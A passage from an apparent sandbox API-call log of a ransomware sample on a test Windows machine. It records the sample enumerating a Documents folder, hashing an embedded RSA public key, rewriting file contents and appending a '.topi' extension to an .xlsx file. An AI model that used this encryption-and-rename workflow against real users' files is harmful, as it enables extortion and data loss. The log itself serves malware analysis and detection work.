lpNumberOfBytesWritten=0x9ccfb14, lpOverlapped=0x0 | out: lpBuffer=0x99f72d8*, lpNumberOfBytesWritten=0x9ccfb14*=0xa4ff, lpOverlapped=0x0) returned 1 [0095.063] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x99f72d8 | out: hHeap=0x680000) returned 1 [0095.063] SetFilePointerEx (in: hFile=0x6a8, liDistanceToMove=0xa504, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0095.063] WriteFile (in: hFile=0x6a8, lpBuffer=0x99dea38*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x9ccfb50, lpOverlapped=0x0 | out: lpBuffer=0x99dea38*, lpNumberOfBytesWritten=0x9ccfb50*=0x100, lpOverlapped=0x0) returned 1 [0095.063] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x99dea38 | out: hHeap=0x680000) returned 1 [0095.063] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x60) returned 0x316dd20 [0095.063] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x428) returned 0x31d01f0 [0095.063] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="ywA3qgOrH00u8DIzdAJmeI3ndBL6uaF5KTvM8FRT", cchWideChar=-1, lpMultiByteStr=0x31d01f0, cbMultiByte=1064, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="ywA3qgOrH00u8DIzdAJmeI3ndBL6uaF5KTvM8FRT", lpUsedDefaultChar=0x0) returned 41 [0095.063] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x430) returned 0x31d0980 [0095.063] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x31d01f0 | out: hHeap=0x680000) returned 1 [0095.064] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x316dd20 | out: hHeap=0x680000) returned 1 [0095.064] WriteFile (in: hFile=0x6a8, lpBuffer=0x31d0980*, nNumberOfBytesToWrite=0x28, lpNumberOfBytesWritten=0x9ccfb50, lpOverlapped=0x0 | out: lpBuffer=0x31d0980*, lpNumberOfBytesWritten=0x9ccfb50*=0x28, lpOverlapped=0x0) returned 1 [0095.064] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x31d0980 | out: hHeap=0x680000) returned 1 [0095.064] lstrlenA (lpString="{36A698B9-D67C-4E07-BE82-0EC5B14B4DF5}") returned 38 [0095.064] WriteFile (in: hFile=0x6a8, lpBuffer=0x504448*, nNumberOfBytesToWrite=0x26, lpNumberOfBytesWritten=0x9ccfb50, lpOverlapped=0x0 | out: lpBuffer=0x504448*, lpNumberOfBytesWritten=0x9ccfb50*=0x26, lpOverlapped=0x0) returned 1 [0095.064] CloseHandle (hObject=0x6a8) returned 1 [0095.070] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x90) returned 0x31b3ff8 [0095.070] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x890) returned 0x31cf750 [0095.070] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x31b3ff8 | out: hHeap=0x680000) returned 1 [0095.070] MoveFileW (lpExistingFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\jxQbVDUd9ordHUbiLNq.xlsx" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\documents\\jxqbvdud9ordhubilnq.xlsx"), lpNewFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\jxQbVDUd9ordHUbiLNq.xlsx.topi" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\documents\\jxqbvdud9ordhubilnq.xlsx.topi")) returned 1 [0095.071] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x31cf750 | out: hHeap=0x680000) returned 1 [0095.071] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x31c3fe8 | out: hHeap=0x680000) returned 1 [0095.071] VirtualFree (lpAddress=0x3750000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0095.072] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x31b3f60 | out: hHeap=0x680000) returned 1 [0095.072] FindNextFileW (in: hFindFile=0x31c7500, lpFindFileData=0x9ccfba4 | out: lpFindFileData=0x9ccfba4*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x6e5d110, ftCreationTime.dwHighDateTime=0x1d5bcfd, ftLastAccessTime.dwLowDateTime=0x1cb81880, ftLastAccessTime.dwHighDateTime=0x1d5b8c6, ftLastWriteTime.dwLowDateTime=0x1cb81880, ftLastWriteTime.dwHighDateTime=0x1d5b8c6, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="lt6ZzNEQACj", cAlternateFileName="LT6ZZN~1")) returned 1 [0095.072] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x70) returned 0x3161e60 [0095.072] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x70) returned 0x3161c80 [0095.072] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x70) returned 0x99e3970 [0095.073] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x3161c80 | out: hHeap=0x680000) returned 1 [0095.073] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x3161e60 | out: hHeap=0x680000) returned 1 [0095.073] FindNextFileW (in: hFindFile=0x31c7500, lpFindFileData=0x9ccfba4 | out: lpFindFileData=0x9ccfba4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x89c92d30, ftCreationTime.dwHighDateTime=0x1d55311, ftLastAccessTime.dwLowDateTime=0x1f20e8f0, ftLastAccessTime.dwHighDateTime=0x1d56023, ftLastWriteTime.dwLowDateTime=0x1f20e8f0, ftLastWriteTime.dwHighDateTime=0x1d56023, nFileSizeHigh=0x0, nFileSizeLow=0xabf3, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="M2mQj1jys6.docx", cAlternateFileName="M2MQJ1~1.DOC")) returned 1 [0095.073] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x60) returned 0x316dd20 [0095.073] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x8e) returned 0x31b3f60 [0095.073] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x316dd20 | out: hHeap=0x680000) returned 1 [0095.073] PathFindExtensionW (pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\M2mQj1jys6.docx") returned=".docx" [0095.073] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\M2mQj1jys6.docx" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\documents\\m2mqj1jys6.docx"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x6a8 [0095.073] GetFileSizeEx (in: hFile=0x6a8, lpFileSize=0x9ccfb40 | out: lpFileSize=0x9ccfb40*=44019) returned 1 [0095.073] VirtualAlloc (lpAddress=0x0, dwSize=0x25815, flAllocationType=0x1000, flProtect=0x4) returned 0x3750000 [0095.076] SetFilePointerEx (in: hFile=0x6a8, liDistanceToMove=0xabcd, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0095.076] ReadFile (in: hFile=0x6a8, lpBuffer=0x3750000, nNumberOfBytesToRead=0x26, lpNumberOfBytesRead=0x9ccfb78, lpOverlapped=0x0 | out: lpBuffer=0x3750000*, lpNumberOfBytesRead=0x9ccfb78*=0x26, lpOverlapped=0x0) returned 1 [0095.077] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x30) returned 0x31c3fe8 [0095.077] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x31c3fe8 | out: hHeap=0x680000) returned 1 [0095.077] SetFilePointer (in: hFile=0x6a8, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0095.077] ReadFile (in: hFile=0x6a8, lpBuffer=0x3750000, nNumberOfBytesToRead=0x25805, lpNumberOfBytesRead=0x9ccfb70, lpOverlapped=0x0 | out: lpBuffer=0x3750000*, lpNumberOfBytesRead=0x9ccfb70*=0xabf3, lpOverlapped=0x0) returned 1 [0095.077] lstrlenA (lpString="-----BEGIN PUBLIC KEY-----\\\\nMIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEAxnvHZzybKGUxH+Cc7ttW\\\\nHyoUm91TmryPiZ9LNnaMWhnZS7t38EODQuii2GcK55Ao4ABm2yEHPJ14ahmXpL+n\\\\n\\/k8p8BIMBjXGBDQcLASJ22fAabOruiNa83d0jz71y4\\/zLglfnHHFdyjFfNDlFvgG\\\\nipjfuYMJ2awwHYNxu0eGTRwFoeFN0gYV8wJauSL2tH\\/CRGeRp0GzRCXBasIKVhIe\\\\n6PmZEE3u03hDY6XBRU8yz4AFxBhgSJDJrrSoUyYfhrrxBXfeEicdl5iq8yJIRGs+\\\\nZiX0IBUK3KZQidFLch4zt8Xm8hGfH5Rks+xUVIAQP7+M3VHWYK9GmZZ5tjyWxwoO\\\\nIQIDAQAB\\\\n-----END PUBLIC KEY-----\\\\n") returned 492 [0095.077] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x1f1) returned 0x31d5100 [0095.077] lstrlenA (lpString="-----BEGIN PUBLIC KEY-----\\\\nMIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEAxnvHZzybKGUxH+Cc7ttW\\\\nHyoUm91TmryPiZ9LNnaMWhnZS7t38EODQuii2GcK55Ao4ABm2yEHPJ14ahmXpL+n\\\\n\\/k8p8BIMBjXGBDQcLASJ22fAabOruiNa83d0jz71y4\\/zLglfnHHFdyjFfNDlFvgG\\\\nipjfuYMJ2awwHYNxu0eGTRwFoeFN0gYV8wJauSL2tH\\/CRGeRp0GzRCXBasIKVhIe\\\\n6PmZEE3u03hDY6XBRU8yz4AFxBhgSJDJrrSoUyYfhrrxBXfeEicdl5iq8yJIRGs+\\\\nZiX0IBUK3KZQidFLch4zt8Xm8hGfH5Rks+xUVIAQP7+M3VHWYK9GmZZ5tjyWxwoO\\\\nIQIDAQAB\\\\n-----END PUBLIC KEY-----\\\\n") returned 492 [0095.077] lstrlenA (lpString="-----BEGIN PUBLIC KEY-----\\\\nMIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEAxnvHZzybKGUxH+Cc7ttW\\\\nHyoUm91TmryPiZ9LNnaMWhnZS7t38EODQuii2GcK55Ao4ABm2yEHPJ14ahmXpL+n\\\\n\\/k8p8BIMBjXGBDQcLASJ22fAabOruiNa83d0jz71y4\\/zLglfnHHFdyjFfNDlFvgG\\\\nipjfuYMJ2awwHYNxu0eGTRwFoeFN0gYV8wJauSL2tH\\/CRGeRp0GzRCXBasIKVhIe\\\\n6PmZEE3u03hDY6XBRU8yz4AFxBhgSJDJrrSoUyYfhrrxBXfeEicdl5iq8yJIRGs+\\\\nZiX0IBUK3KZQidFLch4zt8Xm8hGfH5Rks+xUVIAQP7+M3VHWYK9GmZZ5tjyWxwoO\\\\nIQIDAQAB\\\\n-----END PUBLIC KEY-----\\\\n") returned 492 [0095.077] CryptAcquireContextW (in: phProv=0x9ccfa50, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x9ccfa50*=0x6df3c0) returned 1 [0095.078] CryptCreateHash (in: hProv=0x6df3c0, Algid=0x8003, hKey=0x0, dwFlags=0x0, phHash=0x9ccfa58 | out: phHash=0x9ccfa58) returned 1 [0095.078] CryptHashData (hHash=0x31c7580, pbData=0x31d5100, dwDataLen=0x1f1, dwFlags=0x0) returned 1 [0095.078] CryptGetHashParam (in: hHash=0x31c7580, dwParam=0x2, pbData=0x0, pdwDataLen=0x9ccfa54, dwFlags=0x0 | out: pbData=0x0, pdwDataLen=0x9ccfa54) returned 1 [0095.078] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x11) returned 0x314d0e8 [0095.078] CryptGetHashParam (in: hHash=0x31c7580, dwParam=0x2, pbData=0x314d0e8, pdwDataLen=0x9ccfa54, dwFlags=0x0 | out: pbData=0x314d0e8, pdwDataLen=0x9ccfa54) returned 1 [0095.078] GetLastError () returned 0x0 [0095.078] CryptDestroyHash (hHash=0x31c7580) returned 1 [0095.078] CryptReleaseContext (hProv=0x6df3c0, dwFlags=0x0) returned 1 [0095.078] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x31d5100 | out: hHeap=0x680000) returned 1 [0095.078] UuidCreate (in: Uuid=0x9ccfa48 | out: Uuid=0x9ccfa48) returned 0x0 [0095.079] UuidToStringA (in: Uuid=0x9ccfa48, StringUuid=0x9ccfa40 | out: StringUuid=0x9ccfa40) returned 0x0 [0095.079] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x30) returned 0x31c3fb0 [0095.079] RpcStringFreeA (in: String=0x9ccfa40 | out: String=0x9ccfa40) returned 0x0 [0095.079] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x31c3fe8 | out: hHeap=0x680000) returned 1 [0095.079] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x30) returned 0x31c3fe8 [0095.079] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0xabf0) returned 0x99f72d8 [0095.079] SetFilePointer (in: hFile=0x6a8, lDistanceToMove=5, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x5 [0095.079] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x31c3fb0 | out: hHeap=0x680000) returned 1 [0095.079] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x1f0) returned 0x99e1970 [0095.079] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x30) returned 0x31c3fb0 [0095.079] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x1f0) returned 0x99e1b68 [0095.079] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x58) returned 0x99d9e08 [0095.079] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x40) returned 0x99f1770 [0095.079] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0xc) returned 0x99d92e8 [0095.079] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x40) returned 0x99f17b8 [0095.079] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0xc) returned 0x99d9300 [0095.079] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0xc) returned 0x99d9330 [0095.079] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0xc) returned 0x99d8e68 [0095.079] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0xc) returned 0x99d9348 [0095.079] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x24) returned 0x31d4940 [0095.079] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x158) returned 0x9a04a18 [0095.080] RtlReAllocateHeap (Heap=0x680000, Flags=0x0, Ptr=0x9a04a18, Size=0x218) returned 0x99e8eb0 [0095.080] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x558) returned 0x31d01f0 [0095.080] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x99d9330 | out: hHeap=0x680000) returned 1 [0095.080] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x99d9348 | out: hHeap=0x680000) returned 1 [0095.080] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x99d8e68 | out: hHeap=0x680000) returned 1 [0095.080] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x31d4940 | out: hHeap=0x680000) returned 1 [0095.080] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x31d01f0 | out: hHeap=0x680000) returned 1 [0095.080] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0xc) returned 0x99d8e68 [0095.080] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x8) returned 0x316e9a8 [0095.080] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x10) returned 0x99d9348 [0095.080] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x18) returned 0x314d0a8 [0095.080] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x9) returned 0x99d9330 [0095.080] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x8) returned 0x316e9d8 [0095.080] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x10e) returned 0x31b6350 [0095.080] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x20) returned 0x31ef928 [0095.080] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x58) returned 0x99d9d48 [0095.080] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x14) returned 0x314d0e8 [0095.080] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x104) returned 0x31919a8 [0095.080] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x14) returned 0x314df08 [0095.080] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x4) returned 0x316e958 [0095.080] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x31b6350 | out: hHeap=0x680000) returned 1 [0095.080] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x99d9348 | out: hHeap=0x680000) returned 1 [0095.080] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x316e9d8 | out: hHeap=0x680000) returned 1 [0095.080] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x99d9330 | out: hHeap=0x680000) returned 1 [0095.080] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x314d0a8 | out: hHeap=0x680000) returned 1 [0095.080] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x316e9a8 | out: hHeap=0x680000) returned 1 [0095.080] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x99d8e68 | out: hHeap=0x680000) returned 1 [0095.080] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x31ef928 | out: hHeap=0x680000) returned 1 [0095.080] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x99d9e08 | out: hHeap=0x680000) returned 1 [0095.080] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x99e8eb0 | out: hHeap=0x680000) returned 1 [0095.080] GetCurrentThreadId () returned 0x8c4 [0095.081] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x100) returned 0x99dea38 [0095.081] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x82) returned 0x99f5920 [0095.081] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x2c) returned 0x31c3f78 [0095.081] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x80) returned 0x6df3c0 [0095.081] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x148) returned 0x31ce620 [0095.081] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x4) returned 0x316e9a8 [0095.081] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x4) returned 0x316e9d8 [0095.081] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x100) returned 0x99def60 [0095.081] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x64) returned 0x751ab8 [0095.081] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x751ab8 | out: hHeap=0x680000) returned 1 [0095.081] GetCurrentThreadId () returned 0x8c4 [0095.081] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x64) returned 0x751ab8 [0095.081] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x751ab8 | out: hHeap=0x680000) returned 1 [0095.081] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0xeb) returned 0x99e4988 [0095.081] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x64) returned 0x751ab8 [0095.081] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x751ab8 | out: hHeap=0x680000) returned 1 [0095.081] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x64) returned 0x751ab8 [0095.081] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x751ab8 | out: hHeap=0x680000) returned 1 [0095.081] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x99e4988 | out: hHeap=0x680000) returned 1 [0095.081] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x100) returned 0x99dee58 [0095.081] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x316e9a8 | out: hHeap=0x680000) returned 1 [0095.081] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x4c) returned 0x31cb510 [0095.081] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x4) returned 0x316e9a8 [0095.081] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x100) returned 0x99ded50 [0095.081] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x4) returned 0x316e9c8 [0095.081] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0xc) returned 0x99d8e68 [0095.081] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x316e9c8 | out: hHeap=0x680000) returned 1 [0095.081] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x4) returned 0x316e9c8 [0095.081] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x4) returned 0x316e918 [0095.081] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x4) returned 0x316e968 [0095.081] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x4) returned 0x316e9f8 [0095.081] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x4) returned 0x316e948 [0095.081] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x4) returned 0x316e9b8 [0095.082] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x4) returned 0x316e998 [0095.082] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0xc) returned 0x99d9330 [0095.082] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x316e918 | out: hHeap=0x680000) returned 1 [0095.082] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x8) returned 0x316e918 [0095.082] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x316e9c8 | out: hHeap=0x680000) returned 1 [0095.082] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x4) returned 0x316e9c8 [0095.082] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x4) returned 0x316ea18 [0095.082] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x4) returned 0x316e9e8 [0095.082] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x4) returned 0x316ea08 [0095.082] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0xc) returned 0x99d9348 [0095.082] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x316e9e8 | out: hHeap=0x680000) returned 1 [0095.082] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x14) returned 0x314d0a8 [0095.082] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x316ea18 | out: hHeap=0x680000) returned 1 [0095.082] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0xc) returned 0x99d9318 [0095.082] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x316ea08 | out: hHeap=0x680000) returned 1 [0095.082] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0xc) returned 0x99d8eb0 [0095.082] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x316e9c8 | out: hHeap=0x680000) returned 1 [0095.082] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0xc) returned 0x99d8e80 [0095.082] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x316e968 | out: hHeap=0x680000) returned 1 [0095.082] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0xc) returned 0x99d89a0 [0095.082] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x316e9b8 | out: hHeap=0x680000) returned 1 [0095.082] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x10) returned 0x99d9360 [0095.082] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x99d89a0 | out: hHeap=0x680000) returned 1 [0095.082] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x10) returned 0x99d89a0 [0095.082] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x99d8e80 | out: hHeap=0x680000) returned 1 [0095.082] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x8) returned 0x316e9b8 [0095.082] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x316e9a8 | out: hHeap=0x680000) returned 1 [0095.082] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x14) returned 0x314c608 [0095.082] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x316e9b8 | out: hHeap=0x680000) returned 1 [0095.082] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x18) returned 0x314c768 [0095.082] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x99d9330 | out: hHeap=0x680000) returned 1 [0095.082] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0xc) returned 0x99d9330 [0095.082] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x316e918 | out: hHeap=0x680000) returned 1 [0095.083] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x204) returned 0x99e8eb0 [0095.083] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x99d8e68 | out: hHeap=0x680000) returned 1 [0095.083] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x108) returned 0x3191ac0 [0095.083] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x99d89a0 | out: hHeap=0x680000) returned 1 [0095.083] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x210) returned 0x99e9300 [0095.083] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x314c768 | out: hHeap=0x680000) returned 1 [0095.083] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x10c) returned 0x31b6350 [0095.083] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x316e9f8 | out: hHeap=0x680000) returned 1 [0095.083] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x108) returned 0x3191bd8 [0095.083] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x99d9330 | out: hHeap=0x680000) returned 1 [0095.083] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x200) returned 0x31d5100 [0095.083] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x3191ac0 | out: hHeap=0x680000) returned 1 [0095.083] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x100) returned 0x99deb40 [0095.083] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x316e9d8 | out: hHeap=0x680000) returned 1 [0095.083] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x6df3c0 | out: hHeap=0x680000) returned 1 [0095.083] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x99dee58 | out: hHeap=0x680000) returned 1 [0095.083] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x99deb40 | out: hHeap=0x680000) returned 1 [0095.083] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x314c608 | out: hHeap=0x680000) returned 1 [0095.083] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x3191bd8 | out: hHeap=0x680000) returned 1 [0095.083] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x99e9300 | out: hHeap=0x680000) returned 1 [0095.083] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x31d5100 | out: hHeap=0x680000) returned 1 [0095.083] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x31b6350 | out: hHeap=0x680000) returned 1 [0095.083] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x316e948 | out: hHeap=0x680000) returned 1 [0095.083] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x99d9360 | out: hHeap=0x680000) returned 1 [0095.083] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x316e998 | out: hHeap=0x680000) returned 1 [0095.083] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x99d8eb0 | out: hHeap=0x680000) returned 1 [0095.083] HeapFree 